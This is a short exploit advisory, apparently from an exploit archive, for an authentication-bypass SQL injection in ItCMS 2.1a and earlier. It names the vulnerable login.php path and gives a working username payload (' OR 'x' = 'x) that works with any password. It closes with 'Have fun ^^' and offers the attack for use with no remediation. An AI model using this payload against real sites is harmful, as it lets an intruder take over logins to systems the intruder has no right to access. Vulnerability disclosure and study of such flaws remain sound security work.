id: 4614
date: 01/06/2009
title: ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability
author: certaindeath
cves: 

=======================================================
ItCMS <= 2.1a (Auth Bypass) SQL Injection Vulnerability
=======================================================


--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
--+++~~~~~ IT!CMS <= vers. SQL Injection Vulnerability ~~~~~+++--
--+++~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+++--
[+] Discovered by: certaindeath
[+] Exploit: simple SQL injection
[+] Path: [cms dir]/login.php
[+] Username: ' OR 'x' = 'x
[+] Password: anything
[+] Have fun ^^



#  0day.today [2023-03-27]  #